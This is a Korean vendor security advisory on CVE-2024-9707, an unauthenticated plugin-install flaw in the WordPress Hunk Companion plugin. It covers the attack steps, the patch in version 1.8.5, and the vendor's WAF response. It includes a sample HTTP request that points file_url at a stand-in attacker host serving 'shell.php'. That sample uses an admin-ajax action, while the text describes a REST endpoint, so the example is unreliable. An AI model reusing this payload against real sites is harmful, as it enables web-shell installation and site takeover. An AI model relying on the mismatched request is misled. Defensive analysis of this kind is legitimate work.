[2025년 2월 취약점 보고서] HUNK COMPANION Plugin Remote Code Execution (CVE-2024-9707)
헝크 컴패니언 플러그인의 이 주요 취약점은 더 광범위한 익스플로잇 체인의 첫 단계가 될 수 있습니다. 알려진 취약점이 있는 다른 플러그인이 이 취약점을 통해 활성화되면 공격자는 워드프레스 사이트에서 원격 코드 실행을 달성할 수 있습니다.
워드프레스의 광범위한 배포, 테마헝크 테마의 인기, 결함의 치명적인 특성으로 인해 심각한 보안 위험이 될 수 있습니다.
결론적으로, 이 취약점은 소프트웨어 구성 요소 내에서 적절한 보안 검토를 수행하고 강력한 인증 및 권한 검사를 구현하는 것이 중요하다는 점을 강조합니다. 광범위한 영향력과 악용의 용이성으로 인해 즉각적인 주의와 조치가 필요한 심각한 위협입니다.
저희 AIWAF 제품은 다양한 플러그인의 취약점을 해결하기 위한 패턴을 개발했으며, 앞으로도 관련 취약점이 발견되는 대로 신속하게 대응할 것입니다.
1. 개요
WordPress용 Hunk Companion 플러그인은 웹 사이트를 생성 하는데 필요한 기능들이 들어있는 플러그인으로, 해당 플러그인에서 발견된 RCE 취약점인 CVE-2024-9707에 대해 분석한 내용입니다.
출처 : https://www.bleepingcomputer.com/news/security/hunk-companion-wordpress-plugin-exploited-to-install-vulnerable-plugins/
2. 공격 유형
CVE-2024-9707은 WordPress용 Hunk Companion 플러그인은 1.8.4를 포함한 모든 버전에서 /wp-json/hc/v1/themehunk-import REST API 엔드포인트에 대한 기능 확인이 누락되어 무단 플러그인 설치/활성화에 취약합니다. 이를 통해 인증되지 않은 공격자가 임의의 플러그인을 설치하고 활성화할 수 있으며, 이를 활용하여 다른 취약한 플러그인이 설치되고 활성화되면 원격 코드 실행을 달성할 수 있습니다.
공격 방법:
- 공격자는 /wp-json/hc/v1/themehunk-import 엔드포인트에 조작된 HTTP 요청을 보냅니다.
- 기능 검사가 누락되어 사용자 인증이나 권한을 검증하지 않고 요청이 처리됩니다.
- 요청에 지정된 플러그인이 대상 WordPress 인스턴스에 설치되고 활성화됩니다.
예시 공격 구문:
POST /wp-admin/admin-ajax.php?action=hunk_companion_import HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: ...
content={"file_url":"http://evil.com/shell.php"}
3. 대응
CVE-2024-9707은 Hunk Companion Plugin을 1.8.5 이상의 패치로 대응 되었습니다.
해당 취약점의 경우 /wp-json/hc/v1/themehunk-import 엔드포인트에 조작된 HTTP 요청을 통한 공격 방식으로 보여집니다.
하여 저희 AIWAF 제품에서 추가 분석을 진행하여 패턴으로 대응할 예정입니다.
4. 결론
Hunk Companion 플러그인의 이 주요 취약점은 보다 광범위한 악용 체인의 첫 단계가 될 수 있습니다. 알려진 취약점이 있는 다른 플러그인이 이 취약점을 통해 활성화되면 공격자는 WordPress 사이트에서 원격 코드 실행을 달성할 수 있습니다.
WordPress의 광범위한 배포, ThemeHunk 테마의 인기, 그리고 결함의 중대한 특성이 결합되어 이는 심각한 보안 위험이 됩니다.
결론적으로, 이 취약점은 적절한 보안 검토를 수행하고 소프트웨어 구성 요소 내에서 강력한 인증 및 권한 부여 검사를 구현하는 것의 중요성을 강조합니다. 광범위한 영향과 취약점의 용이성으로 인해 즉각적인 주의와 수정이 필요한 심각한 위협이 됩니다.
저희 AIWAF 제품에서는 각종 플러그인에서 발생하는 취약점들에 대해 패턴을 개발하여 대응하고 있으며 추후에도 발견되는 관련 취약점들에 대해서도 신속하게 대응할 예정입니다.